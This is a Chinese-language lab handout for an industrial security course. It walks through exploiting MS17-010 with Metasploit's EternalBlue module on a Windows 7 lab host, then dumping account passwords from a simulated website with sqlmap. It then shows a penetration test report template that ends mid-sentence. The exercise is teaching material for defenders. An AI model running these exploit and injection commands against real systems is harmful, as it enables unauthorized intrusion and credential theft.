工控安全职业证书技能实践：渗透测试报告设计与编写.docxVIP

渗透测试报告设计与编写 课程级别 信息安全专业工业互联网安全方向 实验概述 此实验目的是加深渗透测试报告编写流程及内容的理解，并对一次模拟的渗透测试进行渗透测试报告编写。 实验目标 实现简单的系统渗透测试 实现简单的网站渗透测试 实现渗透测试报告编写 预备知识 熟悉渗透测试报告编写的基础知识 建议课时数、 4个课时 实验环境准备 1. kali 2021 2. window7操作系统 实验步骤 某电力监控系统为对其网站系统进行安全评估，邀请你为其进行web服务器和管理网站进行渗透测试。已知该网站系统的web服务器为windows7操作系统，请对其进行简单的渗透测试并编写渗透测试报告。 任务一 系统渗透测试 本实验中，某台web服务器的ip地址为40， 1.进入msfconsole模块 2.选择auxiliary/scanner/smb/smb_ms17_010模块，该模块能够扫描目标主机是否存在MS17-010漏洞。 use auxiliary/scanner/smb/smb_ms17_010 3设置目标机ip set RHOSTS 40 4.输入run并查看测试结果，可以发现目标主机存在MS17-010漏洞。 5.利用该漏洞对目标主机实施攻击 ①加载ms17_010_eternalblue模块 use exploit/windows/smb/ms17_010_eternalblue ②设置目标机ip set RHOSTS 40 ③输入run，显示连接成功，获得了目标机的权限 任务二 网站渗透测试 以墨子仿真靶场模拟该电力监控系统的管理网站 （/bug/detail/dE1HSW5yYThxUHcyUTZab2pTcmpGUT09bW96aGUmozh） 1.打开kali查看Sqlmap是否正常使用，输入sqlmap。如果出现下图界面则代表sqlmap可以正常使用。 2.找到该网站URL链接后，输入： sqlmap -u 28:41755/new_list.php?id=tingjigonggao~ 检测该URL是否有SQL注入漏洞，发现确实存在SQL注入漏洞。 3.使用自动化SQL注入查询数据库信息。可以发现存在五个数据库，其中有一个是mozhe_discuz_stormgroup的数据库。 sqlmap -u 28:41755/new_list.php?id=tingjigonggao~ -batch -dbs 4.使用自动化SQL注入查询数据库中表的信息。 sqlmap -u 28:41755/new_list.php?id=tingjigonggao~ -batch -D mozhe_discuz_stormgroup -tables 5.使用自动化SQL注入查询数据库中表的信息。发现了stormgroup_member表中有password和id的列。 sqlmap -u 28:41755/new_list.php?id=tingjigonggao~ -batch -D mozhe_discuz_stormgroup -T stormgroup_member -columns 6. 使用自动化SQL注入查询数据库中表的数据。成功查询到账户密码。 sqlmap -u 28:41755/new_list.php?id=tingjigonggao~ -batch -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password -dump 任务三 渗透测试报告编写 以本次实验渗透测试结果编写渗透测试报告。 1.概述 渗透测试对象 某电力监控系统web服务器和管理网站 开始时间 20XX年XX月XX日 结束时间 20XX年XX月XX日 适用性声明 本次渗透测试是某电力监控系统的网站系统进行的安全风险深度评估，根据评估结果所提交的技术报告，用于对该网站系统的安全状况做出安全评估和加固建议，仅限该电力监控系统目标相关内部人员传阅。 2.使用的工具 工具名称 用途简介 Metasploit Metasploit是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。 Sqlmap Sqlmap是一种开源的渗透测试工具，可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 3.漏洞摘要 NO 危害等级 漏洞名称 修复建议 1 高 MS17-010 安装永恒之蓝漏洞修复最新补丁或关闭445端口 2 高 SQL注入漏洞 加强对用户输入的验证；普通用户与系统管